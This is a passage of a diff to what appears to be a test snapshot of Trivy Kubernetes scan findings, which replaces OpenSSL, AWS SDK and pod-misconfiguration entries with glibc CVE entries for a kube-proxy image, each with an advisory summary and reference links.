"value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git;h=ddc650e9b3dc916eab417ce9f79e67337b05035c", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://ubuntu.com/security/notices/USN-4416-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://usn.ubuntu.com/4416-1/", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-1752", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "3.1.1-r0", - "foundIn": "Target: 'docker.io/aquasec/trivy:0.42.0 (alpine 3.18.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2023-2650", - "installedVersion": "3.1.0-r4", - "packageName": "libssl3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-6096", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "http://www.openwall.com/lists/oss-security/2023/05/30/1", - "https://access.redhat.com/security/cve/CVE-2023-2650", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", - "https://ubuntu.com/security/notices/USN-6119-1", - "https://www.cve.org/CVERecord?id=CVE-2023-2650", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230530.txt", + "https://access.redhat.com/security/cve/CVE-2020-6096", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/attachment.cgi?id=12334", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", + "https://ubuntu.com/security/notices/USN-4954-1", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://www.cve.org/CVERecord?id=CVE-2020-6096", + "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", ], }, "category": "Vulnerability", - "description": "Issue summary: Processing some specially crafted ASN.1 object identifiers or -data containing them may be very slow. - -Impact summary: Applications that use OBJ_obj2txt() directly, or use any of -the OpenSSL subsystems OCSP, PKCS7/SMIME, CMS, CMP/CRMF or TS with no message -size limit may experience notable to very long delays when processing those -messages, which may lead to a Denial of Service. - -An OBJECT IDENTIFIER is composed of a series of numbers - sub-identifiers - -most of which have no size limit. OBJ_obj2txt() may be used to translate -an ASN.1 OBJECT IDENTIFIER given in DER encoding form (using the OpenSSL -type ASN1_OBJECT) to its canonical numeric text form, which are the -sub-identifiers of the OBJECT IDENTIFIER in decimal form, separated by -periods. - -When one of the sub-identifiers in the OBJECT IDENTIFIER is very large -(these are sizes that are seen as absurdly large, taking up tens or hundreds -of KiBs), the translation to a decimal number in text may take a very long -time. The time complexity is O(n^2) with 'n' being the size of the -sub-identifiers in bytes (*). - -With OpenSSL 3.0, support to fetch cryptographic algorithms using names / -identifiers in string form was introduced. This includes using OBJECT -IDENTIFIERs in canonical numeric text form as identifiers for fetching -algorithms. - -Such OBJECT IDENTIFIERs may be received through the ASN.1 structure -AlgorithmIdentifier, which is commonly used in multiple protocols to specify -what cryptographic algorithm should be used to sign or verify, encrypt or -decrypt, or digest passed data. - -Applications that call OBJ_obj2txt() directly with untrusted data are -affected, with any version of OpenSSL. If the use is for the mere purpose -of display, the severity is considered low. - -In OpenSSL 3.0 and newer, this affects the subsystems OCSP, PKCS7/SMIME, -CMS, CMP/CRMF or TS. It also impacts anything that processes X.509 -certificates, including simple things like verifying its signature. - -The impact on TLS is relatively low, because all versions of OpenSSL have a -100KiB limit on the peer's certificate chain. Additionally, this only -impacts clients, or servers that have explicitly enabled client -authentication. - -In OpenSSL 1.1.1 and 1.0.2, this only affects displaying diverse objects, -such as X.509 certificates. This is assumed to not happen in such a way -that it would cause a Denial of Service, so these versions are considered -not affected by this issue in such a way that it would be cause for concern, -and the severity is therefore considered low.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the 'num' parameter results in a signed comparison vulnerability. If an attacker underflows the 'num' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "Possible DoS translating ASN.1 object identifiers", + "name": "glibc: signed comparison vulnerability in the ARMv7 memcpy function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-2650", + "value": "https://avd.aquasec.com/nvd/cve-2020-6096", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/05/30/1", + "value": "https://access.redhat.com/security/cve/CVE-2020-6096", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-2650", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6096", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2650", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=423a2bc737a908ad0c77bda470b2b59dc879936b", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=853c5e56ee0b8650c73140816bb8b91d6163422c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SPYXTDOOB4PQGTYAMZAZNJIB3FF6YQXI/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9e209944b35cf82368071f160a744b6178f9b098", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/URXOIA2LDUKHQXK4BE55BQBRI6ZZG3Y6/", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=db779b0e10b047f2585615e0b8f2acdf21f8544a", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-6096", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", + "value": "https://sourceware.org/bugzilla/attachment.cgi?id=12334", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=25620", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6119-1", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", + "value": "https://ubuntu.com/security/notices/USN-4954-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230530.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-6096", + }, + { + "type": "URL", + "value": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1019", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8911", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3326", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8911", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", - "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "http://www.openwall.com/lists/oss-security/2021/01/28/2", + "https://access.redhat.com/security/cve/CVE-2021-3326", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", + "https://linux.oracle.com/cve/CVE-2021-3326.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210304-0007/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5699-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3326", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "A padding oracle vulnerability exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. The SDK allows users to encrypt files with AES-CBC without computing a Message Authentication Code (MAC), which then allows an attacker who has write access to the target's S3 bucket and can observe whether or not an endpoint with access to the key can decrypt a file, they can reconstruct the plaintext with (on average) 128*length (plaintext) queries to the endpoint, by exploiting CBC's ability to manipulate the bytes of the next block and PKCS5 padding errors. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "aws/aws-sdk-go: CBC padding oracle issue in AWS S3 Crypto SDK for golang", + "name": "glibc: Assertion failure in ISO-2022-JP-3 gconv module related to combining characters", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8911", + "value": "https://avd.aquasec.com/nvd/cve-2021-3326", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8911", + "value": "http://www.openwall.com/lists/oss-security/2021/01/28/2", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://access.redhat.com/security/cve/CVE-2021-3326", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869800", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2146", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3326", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://linux.oracle.com/cve/CVE-2021-3326.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-f5pg-7wfw-84q9", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3326", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8911", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8911", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", + }, + { + "type": "URL", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5699-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'usr/local/bin/trivy' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2020-8912", - "installedVersion": "v1.44.245", - "packageName": "github.com/aws/aws-sdk-go", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://access.redhat.com/security/cve/CVE-2020-8912", - "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", - "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", - "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", - "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", - "https://github.com/aws/aws-sdk-go/pull/3403", - "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", - "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", - "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", - "https://pkg.go.dev/vuln/GO-2022-0646", - "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "A vulnerability in the in-band key negotiation exists in the AWS S3 Crypto SDK for GoLang versions prior to V2. An attacker with write access to the targeted bucket can change the encryption algorithm of an object in the bucket, which can then allow them to change AES-GCM to AES-CTR. Using this in combination with a decryption oracle can reveal the authentication key used by AES-GCM as decrypting the GMAC tag leaves the authentication key recoverable as an algebraic equation. It is recommended to update your SDK to V2 or later, and re-encrypt your files.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "aws-sdk-go: In-band key negotiation issue in AWS S3 Crypto SDK for golang", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-8912", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-8912", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://aws.amazon.com/blogs/developer/updates-to-the-amazon-s3-encryption-client/?s=09", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1869801", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/1e84382fa1c0086362b5a4b68e068d4f8518d40e", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/commit/ae9b9fd92af132cfd8d879809d8611825ba135f4", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://github.com/aws/aws-sdk-go/pull/3403", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://github.com/google/security-research/security/advisories/GHSA-7f33-f4f5-xwgw", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/sophieschmieg/exploits/tree/master/aws_s3_crypto_poc", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-8912", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0646", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-8912", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv011", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV012", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv012", - ], - }, - "category": "Misconfiguration", - "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", - "name": "Runs as root user(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.runAsNonRoot' to true)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv012", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV014", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc-bin", "references": [ - "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", - "https://avd.aquasec.com/misconfig/ksv014", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, - "category": "Misconfiguration", - "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", - "name": "Root file system is not read-only(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'securityContext.readOnlyRootFilesystem' to true)", + "category": "Vulnerability", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv014", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV015", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv015", - ], - }, - "category": "Misconfiguration", - "description": "When containers have resource requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].resources.requests.cpu'.", - "name": "CPU requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.cpu')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv015", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV016", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv016", - ], - }, - "category": "Misconfiguration", - "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set 'containers[].resources.requests.memory'.", - "name": "Memory requests not specified(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.requests.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv016", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Job/scan-trivy-k8s-kvmnm' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV018", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-resources-limits-memory/", - "https://avd.aquasec.com/misconfig/ksv018", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing memory limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=integration-tests&Kind=Job&Name=scan-trivy-k8s-kvmnm", - "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", - "name": "Memory not limited(Container 'trivy' of Job 'scan-trivy-k8s-kvmnm' should set 'resources.limits.memory')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv018", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-resources-limits-memory/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + }, + { + "type": "URL", + "value": 